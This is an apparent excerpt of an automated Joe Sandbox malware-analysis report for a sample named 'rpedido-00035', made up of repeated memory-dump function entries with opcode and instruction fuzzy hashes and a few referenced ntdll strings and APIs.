                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d582e17720e50e3eca6d55b5d309cf6628a8df5a80917708436dbefdd1159623
                                                          • Instruction ID: 102e09757b70e2bd76e8c41684c0bfa54dcc7560be4c21ece6c966b0bed1fa16
                                                          • Opcode Fuzzy Hash: d582e17720e50e3eca6d55b5d309cf6628a8df5a80917708436dbefdd1159623
                                                          • Instruction Fuzzy Hash: 6C90026120140407D58065594945607040587D030AF51C456A3054516ECA798C557136
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fdee53af687fcf9142172446310dcbde7e18225427e5484fc6fdad2195f2cc6f
                                                          • Instruction ID: aecaeac0066870319859901e357158ec4e671f92edc34c5892384555d20a84f1
                                                          • Opcode Fuzzy Hash: fdee53af687fcf9142172446310dcbde7e18225427e5484fc6fdad2195f2cc6f
                                                          • Instruction Fuzzy Hash: 0D90026134100446D54061594555B060405C7E1309F51C45AE2054515DC669CC567137
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 951f6be65b8a04ab11937823ce539658fcbedb278d7343dd36e38c8fb2b1eda3
                                                          • Instruction ID: 3380c5e5266523e6fe4fc8735665c095a137bd451f853bec5674b863d1ecbcbf
                                                          • Opcode Fuzzy Hash: 951f6be65b8a04ab11937823ce539658fcbedb278d7343dd36e38c8fb2b1eda3
                                                          • Instruction Fuzzy Hash: 4290047131100047D544715D45457070445C7F130DF51C457F3144515CC57DCC757137
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 77f274a78f1b319e8c32f0a0e83b871e33fdf4f91589c6af2d28f5921dfed475
                                                          • Instruction ID: 8d0f889b1a14d073e73bd51fc3fa931a6bee6aaeb40e583a9c148269b5f1e0a3
                                                          • Opcode Fuzzy Hash: 77f274a78f1b319e8c32f0a0e83b871e33fdf4f91589c6af2d28f5921dfed475
                                                          • Instruction Fuzzy Hash: 0690023120140406D54061594949747040587D030AF51C456A6154516EC6B5C8957532
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2552ee4d2e3912ee98319118a45b883f1e5f30aa5e9c41cf1e5ab2c3533e3cee
                                                          • Instruction ID: b4117381b7b0cad02de7e3bd6312aa12398fc3ad70d9e5722c0f591fbf936317
                                                          • Opcode Fuzzy Hash: 2552ee4d2e3912ee98319118a45b883f1e5f30aa5e9c41cf1e5ab2c3533e3cee
                                                          • Instruction Fuzzy Hash: 34900221601000468580716989859064405ABE1219751C566A1988511DC5A988696676
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9b8e01d05b44558a8a6f01c80ca517a022183efd4d190a48cacfd698a378adcd
                                                          • Instruction ID: 93e8a8a3278b63ef347edaca9db10cf6d3d2342ba72984da5cfe471edae48401
                                                          • Opcode Fuzzy Hash: 9b8e01d05b44558a8a6f01c80ca517a022183efd4d190a48cacfd698a378adcd
                                                          • Instruction Fuzzy Hash: 8690022121180046D64065694D55B07040587D030BF51C55AA1144515CC96588656532
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3af069c474b4a28d5e05044814965d4a5b78d904bc221a31f41ec08ed09950e8
                                                          • Instruction ID: 99c8556c296342e6d6bf293b2087fce02c84a233f6d6242bdd21381ed1707198
                                                          • Opcode Fuzzy Hash: 3af069c474b4a28d5e05044814965d4a5b78d904bc221a31f41ec08ed09950e8
                                                          • Instruction Fuzzy Hash: F990022120144446D58062594945B0F450587E120AF91C45EA5146515CC96588596732
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8102bf0013cfe6862abe927d4f499e08d6ec4435aa52a78b44247e67f685cf65
                                                          • Instruction ID: 9ce598d355e610ca939c7e201f73fb7ebcf4bc9f7d356a0b15165057fb84f10b
                                                          • Opcode Fuzzy Hash: 8102bf0013cfe6862abe927d4f499e08d6ec4435aa52a78b44247e67f685cf65
                                                          • Instruction Fuzzy Hash: F590022124100806D580715985557070406C7D0609F51C456A1014515DC666896976B2
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6960f11fa7962222570edc46a8504a942535fee628fb6965f6763587ca84e4cd
                                                          • Instruction ID: f5adbb3ccca26ec8f27f8de7a64658b1742167965e2ba5994715449d7cd992f8
                                                          • Opcode Fuzzy Hash: 6960f11fa7962222570edc46a8504a942535fee628fb6965f6763587ca84e4cd
                                                          • Instruction Fuzzy Hash: B190023120100407D54061595649707040587D0209F51D856A1414519DD6A688557132
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b86226dfbfa323b24d4df0e3aca8bace13778677486d6977ea403bddb3fff3e9
                                                          • Instruction ID: 85d94ba49128a4a6659a46dd553224026efb5160617e89750b5411af6b3686f3
                                                          • Opcode Fuzzy Hash: b86226dfbfa323b24d4df0e3aca8bace13778677486d6977ea403bddb3fff3e9
                                                          • Instruction Fuzzy Hash: EB90022120504446D54065595549A06040587D020DF51D456A2054556DC6758855B132
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7f2828553e45690400e6859ca85fe8e94e34072b94381ccc6634effc3fb88f70
                                                          • Instruction ID: 1913118ade2d5a3e65aeb2bae158d49b7edcc2be19c647d0281da6d120a8e32e
                                                          • Opcode Fuzzy Hash: 7f2828553e45690400e6859ca85fe8e94e34072b94381ccc6634effc3fb88f70
                                                          • Instruction Fuzzy Hash: 6390022921300006D5C07159554960A040587D120AF91D85AA1005519CC965886D6332
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b7aadfdb53e41d5966fa0ae18302e2b9f66af7919890d2a9b243ed27a9099245
                                                          • Instruction ID: 884eb62f405d1c7bb162e299c6223b7db472de78b427720e04023350b1e5eeb4
                                                          • Opcode Fuzzy Hash: b7aadfdb53e41d5966fa0ae18302e2b9f66af7919890d2a9b243ed27a9099245
                                                          • Instruction Fuzzy Hash: 7390023120200146D98062595945A4E450587E130AB91D85AA1005515CC96488656232
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1a7c5c266d88e6a45e7564c6fc3a8749ece01600bbb236dc4ee21f231e96c786
                                                          • Instruction ID: bb6d0d14d90a606c38605c96d749811428a044d0de203190daa9c52da7bd0198
                                                          • Opcode Fuzzy Hash: 1a7c5c266d88e6a45e7564c6fc3a8749ece01600bbb236dc4ee21f231e96c786
                                                          • Instruction Fuzzy Hash: B390022130100007D580715955596064405D7E1309F51D456E1404515CD965885A6233
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: dd84158ae6ec1685c99ab3d06a6cb5038cb2a4c6471aebb265f50f65cefaa9c5
                                                          • Instruction ID: a557f52cc92c7a6e79688a5dda6c41aa9597ce60bf4374a31ca12b1336951611
                                                          • Opcode Fuzzy Hash: dd84158ae6ec1685c99ab3d06a6cb5038cb2a4c6471aebb265f50f65cefaa9c5
                                                          • Instruction Fuzzy Hash: 4D90023520100406D95061595945646044687D0309F51D856A1414519DC6A488A5B132
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a1c634099fb414284b87344dc0c5fd58507a19e8824079b9b08c2ce79a0fc647
                                                          • Instruction ID: 653d385b2ce40eee70e0dd51594eddb60f36064d70cc77ecd0f226e5d26c7b5b
                                                          • Opcode Fuzzy Hash: a1c634099fb414284b87344dc0c5fd58507a19e8824079b9b08c2ce79a0fc647
                                                          • Instruction Fuzzy Hash: 5F90023124100406D58171594545606040997D0249F91C457A1414515EC6A58A5ABA72
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 42c25e528add440b0a7fbd0d3caee49b98801b0108dadaf8866e5a135513f444
                                                          • Instruction ID: 4e7f98ecfe0c66382ff68cab944b6c06b68ea3836c1f819bbfa52037a0fe1668
                                                          • Opcode Fuzzy Hash: 42c25e528add440b0a7fbd0d3caee49b98801b0108dadaf8866e5a135513f444
                                                          • Instruction Fuzzy Hash: 0A900221242041569985B1594545507440697E0249791C457A2404911CC576985AE632
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 76b4bbcee0e49316f8b40457ffe0f35a905d6a6f023253a5759e1ea6a01d5216
                                                          • Instruction ID: 5390a002f1832a61cd21828cfe48b2b5aab22d6b2b0601787348e4a5e0f5d61b
                                                          • Opcode Fuzzy Hash: 76b4bbcee0e49316f8b40457ffe0f35a905d6a6f023253a5759e1ea6a01d5216
                                                          • Instruction Fuzzy Hash: 2490023120100417D55161594645707040987D0249F91C857A1414519DD6A68956B132
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6c6dc2aa45f2a1e0f97ae39d2de71e76d470f335b118e78aad0b8b1966186ecc
                                                          • Instruction ID: 1bb90ac38e4eb72b47ab732ac8170a9c542088b2c985279360a4f47233f6d7ed
                                                          • Opcode Fuzzy Hash: 6c6dc2aa45f2a1e0f97ae39d2de71e76d470f335b118e78aad0b8b1966186ecc
                                                          • Instruction Fuzzy Hash: 9190022130100406D542615945556060409C7D134DF91C457E2414516DC6758957B133
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8e20e62f9591ba571a8ac9c76a24be18e31b89b1fb7a8b2decb0c8af6abb6b0f
                                                          • Instruction ID: feefc4e6fac2b949be80be84c1052e1300fa129d950e29a1066898859f395b1b
                                                          • Opcode Fuzzy Hash: 8e20e62f9591ba571a8ac9c76a24be18e31b89b1fb7a8b2decb0c8af6abb6b0f
                                                          • Instruction Fuzzy Hash: 8690022160100506D54171594545616040A87D0249F91C467A2014516ECA758996B132
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 67142ef777b0b991ce945f64b113bfb60c4cea4bc7bfcea0b78a7a5b5bd3d7ff
                                                          • Instruction ID: 3ee2a63e9f967dc19f85cff3b06ac39538c87d26e18895581a34f0276b790fe2
                                                          • Opcode Fuzzy Hash: 67142ef777b0b991ce945f64b113bfb60c4cea4bc7bfcea0b78a7a5b5bd3d7ff
                                                          • Instruction Fuzzy Hash: DE90027120100406D58071594545746040587D0309F51C456A6054515EC6A98DD97676
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7c494374c17427f2ec942501c11c2106365493f641792915de61edd018f55045
                                                          • Instruction ID: e025a534e801f624b94f1bc87671422d729c7c6fe8c9abfa0016881dff80b037
                                                          • Opcode Fuzzy Hash: 7c494374c17427f2ec942501c11c2106365493f641792915de61edd018f55045
                                                          • Instruction Fuzzy Hash: 5B900225221000064585A559074550B084597D6359391C45AF2406551CC67188696332
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5ab5db1d8e060d30616518fa4e498510435224609c3bea7fb5b4349551f2302a
                                                          • Instruction ID: 35bbe3ec2214e007d638ddba5c74b0ee3f561c2b5fa5aebecc03492fe08d440d
                                                          • Opcode Fuzzy Hash: 5ab5db1d8e060d30616518fa4e498510435224609c3bea7fb5b4349551f2302a
                                                          • Instruction Fuzzy Hash: 2990026120200007854571594555616440A87E0209B51C466E2004551DC57588957136
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7681aeb900c7f34a439efedf05f62d4c0b1514227359f5c2d31367692e500f96
                                                          • Instruction ID: c6245074c5438d9d55ea21f2b577e127e3fcf98feeb4d6d58bd8af1ba5965848
                                                          • Opcode Fuzzy Hash: 7681aeb900c7f34a439efedf05f62d4c0b1514227359f5c2d31367692e500f96
                                                          • Instruction Fuzzy Hash: 6490023120100806D54461594945686040587D0309F51C456A7014616ED6B588957132
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 32c7b5756a0ba0a44982b68a49cf662284a39057b01b83fa06ce41b2c29cf73c
                                                          • Instruction ID: 53d6d9228de413b4b9d08a00457e28d8d7c3a9ef5ac312cce705a50c3f16cb01
                                                          • Opcode Fuzzy Hash: 32c7b5756a0ba0a44982b68a49cf662284a39057b01b83fa06ce41b2c29cf73c
                                                          • Instruction Fuzzy Hash: 8890023160500806D59071594555746040587D0309F51C456A1014615DC7A58A5976B2
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 18fd942b64b28111af180b91cb6ac6a1a4f086debf14007a7af76d866fe601dc
                                                          • Instruction ID: 32995cf65febbe0114c2e3d1f439042c1dac999dcb79a57822e66c33ca2d6f88
                                                          • Opcode Fuzzy Hash: 18fd942b64b28111af180b91cb6ac6a1a4f086debf14007a7af76d866fe601dc
                                                          • Instruction Fuzzy Hash: BD90023120504846D58071594545A46041587D030DF51C456A1054655DD6758D59B672
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: af4a2a7486d7b2a24257d5594a37d14438b81a6fb71a0412f335b7a07c21fc33
                                                          • Instruction ID: f1e11a099cff0c8b507cda513e19ada859861d1496455eca41442598302ddebe
                                                          • Opcode Fuzzy Hash: af4a2a7486d7b2a24257d5594a37d14438b81a6fb71a0412f335b7a07c21fc33
                                                          • Instruction Fuzzy Hash: 0390023120100806D5C07159454564A040587D1309F91C45AA1015615DCA658A5D77B2
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                          • Instruction ID: 67b74bc81e602be0e5ef4dbf9a354eb6806b9db1aa10c1165f2b93a617f2941e
                                                          • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                          • Instruction Fuzzy Hash:

                                                          Control-flow Graph
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: DebugPrintTimes
                                                          • String ID: HEAP:
                                                          • API String ID: 3446177414-2466845122
                                                          • Opcode ID: bfc0ce468eb185dc27310d553532d7754bfb3171f139c76fee3eaf4fd7bbed58
                                                          • Instruction ID: 4242dee9a1d7b30f04772ad12cfc1101ce3db849c5105bb092729944c57873f1
                                                          • Opcode Fuzzy Hash: bfc0ce468eb185dc27310d553532d7754bfb3171f139c76fee3eaf4fd7bbed58
                                                          • Instruction Fuzzy Hash: 55A1BEB5A14B218FD704CE29C891A1ABBE5FF8C354F1445AEE945EB310EBB0EC45CB91

                                                          Control-flow Graph
                                                          Strings
                                                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 36084530
                                                          • Execute=1, xrefs: 3608451E
                                                          • ExecuteOptions, xrefs: 360844AB
                                                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 36084507
                                                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 36084592
                                                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 3608454D
                                                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 36084460
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmp
